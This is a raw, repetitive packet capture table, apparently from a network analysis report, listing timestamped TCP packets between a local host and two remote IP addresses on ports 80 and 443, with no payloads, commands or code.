                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.582106113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.583041906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.583085060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.583391905 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.583431959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.584175110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.584193945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.584228992 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.584242105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.585385084 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.585397959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.585433006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.585448027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.586294889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.586338997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.586421967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.586464882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.587493896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.587537050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.587614059 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.587654114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.588500023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.588543892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.588645935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.588685036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.589565992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.589612961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.589616060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.589652061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.590689898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.590742111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.590811014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.590854883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.591690063 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.591732025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.591766119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.591806889 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.592803955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.592847109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.592948914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.592993021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.594005108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.594017029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.594053984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.595274925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.595287085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.595329046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.595359087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.596137047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.596148968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.596205950 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.597225904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.597280025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.597419977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.597466946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.598448992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.598460913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.598495007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.598525047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.599370956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.599395037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.599417925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.599451065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.600425959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.600512028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.600595951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.600634098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.600999117 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601078987 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601100922 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601140976 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601172924 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601232052 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601527929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601569891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601605892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.601649046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.602678061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.602722883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.602722883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.602794886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.603679895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.603730917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.603796005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.603841066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.604888916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.604899883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.604955912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.605031967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.605818033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.605871916 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.606017113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.606062889 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.606884003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.606928110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.607000113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.607044935 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.607986927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.608032942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.608115911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.608160019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.609082937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.609126091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.609236002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.609277010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.610191107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.610234022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.610306978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.610357046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.611371040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.611414909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.611423016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.611462116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.612396955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.612449884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.612485886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.612494946 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.612517118 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.612528086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.613657951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.613670111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.613707066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.613720894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.614566088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.614578962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.614609957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.614633083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616105080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616118908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616153002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616173029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616664886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616715908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616909027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.616955042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.617821932 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.617896080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.617957115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.618000031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.618877888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.618921995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.618957043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.619004011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.620137930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.620153904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.620182037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.620201111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.621105909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.621153116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.621164083 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.621201992 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.622143030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.622186899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.622253895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.622292995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.623254061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.623296976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.623310089 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.623356104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.624387980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.624442101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.624455929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.624495983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.625490904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.625535011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.625572920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.625612974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.626524925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.626571894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.626687050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.626733065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.627619982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.627662897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.627671003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.627717972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.628695011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.628745079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.628750086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.628792048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.629796982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.629848003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.629929066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.629976988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.630884886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.630930901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.630935907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.630965948 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.632111073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.632124901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.632163048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.632179976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.632996082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.633044958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.633173943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.633215904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.634188890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.634201050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.634236097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.634255886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.635344982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.635458946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.635488033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.635529041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.636336088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.636384964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.636481047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.636529922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.637367964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.637415886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.637459993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.637501001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.638715029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.638758898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.719665051 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.719713926 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.719783068 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.720335007 CET49776443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.720350981 CET44349776116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.773633957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.773732901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.773746967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.773798943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.774265051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.774307013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.774375916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.774414062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.775254011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.775299072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.775327921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.775367975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.776375055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.776420116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.776470900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.776511908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.777488947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.777532101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.777560949 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.777601957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.778572083 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.778606892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.778614998 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.778641939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.779701948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.779743910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.779767990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.779808044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.780745983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.780786991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.780796051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.780827999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782290936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782315969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782355070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782371044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782855988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782900095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782937050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.782978058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.783956051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.784003019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.784012079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.784054995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.785021067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.785067081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.785192966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.785237074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.786142111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.786186934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.786223888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.786264896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.787235975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.787290096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.787363052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.787405014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.788332939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.788381100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.788414001 CET804976331.41.244.11192.168.2.4
